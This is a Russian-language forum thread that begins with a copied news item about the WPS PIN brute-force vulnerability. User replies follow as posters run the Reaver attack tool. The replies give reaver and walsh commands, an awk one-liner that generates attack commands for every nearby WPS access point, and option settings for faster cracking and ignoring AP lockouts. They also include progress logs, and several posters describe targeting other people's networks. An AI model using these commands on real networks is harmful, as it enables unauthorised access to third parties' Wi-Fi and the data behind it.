Уязвимость в протоколе Wi-Fi Protected Setup Организация US Computer Emergency Readiness Team опубликовала бюллетень безопасности, описывающий уязвимость в протоколе WPS (Wi-Fi Protected Setup), предназначенном для облегчения настройки безопасности беспроводных роутеров и сетей. Сам протокол — его оригинальное название Wi-Fi Simple Config — был разработан в 2009 году специалистами ассоциации Wi-Fi Alliance целью дать возможность с некоторой долей безопасности пользоваться Wi-Fi лицам, мало сведущим в протоколах и стойких методах шифрования. Традиционно при создании новых WLAN необходимо было выбрать сетевое имя и кодовую фразу для точки доступа, а позднее то же самое — для каждого нового устройства, добавляемого к сети. WPS для упрощения процедуры для конечного пользователя возлагает функцию генерации сетевого имени на саму точку доступа. Для добавления нового клиентского устройства к защищенной сети достаточно будет ввести PIN-код из 4 или 8 цифр или нажать на специальные клавиши, имеющиеся на роутере и добавляемом устройстве. Суть уязвимости заключается в специфике общения между собой точки доступа и новым беспроводным устройством. Злоумышленник, желая получить доступ к сети жертвы, посылает некий PIN-код для аутентификации на роутере. В ответ на неправильный PIN посылается EAP-NACK сообщение таким образом, что хакер способен определить первую половину цифр PIN-кода, а вторую половину оказывается возможным определить, анализируя контрольную сумму при передаче PIN. Все это приводит к тому, что атака методом «грубой силы», вероятней всего, завершится успехом, поскольку число необходимых попыток уменьшается с 10^8 до 10^4+10^3 = 11.000, а время полного перебора PIN-кодов составит от нескольких часов до нескольких суток, в зависимости от реализации WPS на роутере. Пока решения проблемы не существует и тем, у кого роутер настроен на упрощенную схему безопасности, рекомендуется использовать традиционную схему аутентификации. Netgear, D-Link, Belkin и другие производители пока не прокомментировали сообщение об уязвимости. Копипаст с хабра Документ с описанием уязвимости (англ.) Добрые люди уже написали WPS брутфорсер любые вопросы не по теме удаляются !! выкладывать только инфу WPS , (reaver) // добавлено в карту раздела. за троль оффтоп , бан от 7 суток .
попробовал юзнуть wps-bruteeforcer, при команде reaver -i mon0 -b mac -c [канал\ -e [essid] пишет Failed to associate with [mac]
Стоит, наверное, обновить Reaver с помощью svn up, проблема ассоциации была решена. У меня, к сожалению, на роутере Netgear WNR3500L не работает WPS по причине установленной прошивки Tomato-USB. На чужих сетях ничего не получается, хотя Wireshark и показывает наличие настроенного WPS. У кого-нибудь уже получалось подобрать PIN и получить WPA-PSK?
У меня не получилось и не получится.... А жаль. ТД организована не на базе роутера, а по-взрослому - Ubiquiti. А там такая дырявая вещь, как WPS не применяется....
ассоциация есть, но дальше ничего, пробовал 2 раза по 5 минут ждать root@bt:~# reaver -i mon0 -b ------------ Reaver v1.2 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> [+] Waiting for beacon from ------------ [+] Associated with ------------ (ESSID: ------------) [+] 0.00% complete @ 0 seconds/attempt [+] 0.00% complete @ 0 seconds/attempt буду на других точках пробовать
Я ставил фильтр: wps.wifi_protected_setup_state == 0x02 Мог и ошибиться, конечно, но в любом случае копать в тег-параметры (vendor specific) beacon-пакетов. P.S. сейчас в Reaver есть программа walsh, которая показывает точки со включённой WPS.
Например - walsh -i mon0 -o WPS.list grep -v "bad FCS" WPS.list и полусаем, что-то вроде - Scanning for supported APs... 54:E6:FC1:18:F6 (null) D8:5D:4C:F3:44:6A ApptNet 00:22:75:52:BD:4E Belkin_N_Wireless_52bd4e 00:1D:7E:B4:1F:B6 lafferty 00:19:150:5C:29 WLAN_5C29 00:24:17:BB:44:BD ThomsonE4849E 00:50:7F:7C:E5:F8 Ellie ----------------------------------------- Можно коммандный файл сгенерить - awk '/[0-9][A-F]/{print "reaver -i mon0 -b "$1" -e "$2}' WPS.list --------------------------------------------------------------- У меня пока безуспешно ... Пару раз проскакивало - [+] Trying pin 84490445 Но дальше не продвигается. Кстати , walsh ловит ВСЕ точки c WPS и OPEN (без шифрования тоже) Напустил его на OPEN точку, работает ... [+] Waiting for beacon from 00:22:75:52:BD:4E [+] Associated with 00:22:75:52:BD:4E (ESSID: Belkin_N_Wireless_52bd4e) [+] 0.01% complete @ 37 seconds/attempt [+] 0.03% complete @ 20 seconds/attempt [+] 0.05% complete @ 19 seconds/attempt [+] 0.07% complete @ 16 seconds/attempt [+] 0.08% complete @ 31 seconds/attempt
Зацепился за одну из точек, но процесс идёт очень медленно. За 4 часа прогресс такой - [+] 9.35% complete @ 15 seconds/attempt [+] 9.39% complete @ 15 seconds/attempt Похоже, режультат будет видно через пару суток Надеюсь будет положительный
Скомпилируй последний билд из SVN Code: svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only cd reaver-wps-read-only/src ./configure make make install Проект активно развивается, перед запуском на долгие сутки, лучше пересобрать свежачок ... Для ускорения перебора, можно уменьшать тайминги здесь - Code: Advanced Options: -p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin -d, --delay=<seconds> Set the delay between pin attempts [1] -l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [315] -g, --max-attempts=<num> Quit after num pin attempts -x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0] -r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts -t, --timeout=<seconds> Set the receive timeout perio [5] -T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20] -L, --ignore-locks Ignore locked state reported by the target AP -E, --eap-terminate Terminate each WPS session with an EAP FAIL packet -n, --nack Target AP always sends a NACK [Auto] -w, --win7 Mimic a Windows 7 registrar [False] Согласно доке, если AP не блокирует, то время перебора будет не более 4 часов. Если придерживаться спецификаций WSC 2.0, перебор может продолжатться до 65 часов. С дефолтными настройками, оно так и будет.
Дождусь ! У меня вся эта байда на UPS А UPS всю эту байду, часов 5 продержит Кстати, 6 часов назад, автор внёс новые опции для ускорения процесса - Code: Added --dh-small option for speed improvements.
Scapy http://www.secdev.org/projects/scapy/ пишут ещё PyCrypto нужен, но мне на батраке не понадобилcя, наверное есть уже
какие добавлял опции к команде: reaver -i mon0 -b ------------ или так по умолчанию и использовал ? а вообще здорово за 4 часа, а у меня разрывает ассоциацию ((
Поздравляю . Мньше чем за 4 часа. А ключик проверили ? У мня уже почти 18 часов крутится, но должно скоро закончиться Code: [+] 97.30% complete @ 10 seconds/attempt [+] 97.35% complete @ 10 seconds/attempt [+] 97.39% complete @ 10 seconds/attempt Сейчас опять очередной лок от АП ... значит 5 минут ждёмс ... У меня в начале было 16 seconds/attempt, а на финише 10 seconds/attempt. НО ! Похоже участились локи
ха........... нет не так , кароче сам список создаеться но внем ничего не находит пишет что нету нифига но точек куча неужели среди 100 точек нету ниодной тут разные провайдеры шифрование роутеры моделей 8 наверное разных а так же пользователи и полный ноль ........... странно ....... нашло пин 8 цыфр за 2 минуты .......... папиросу выкурить не успел ....... едим дальше
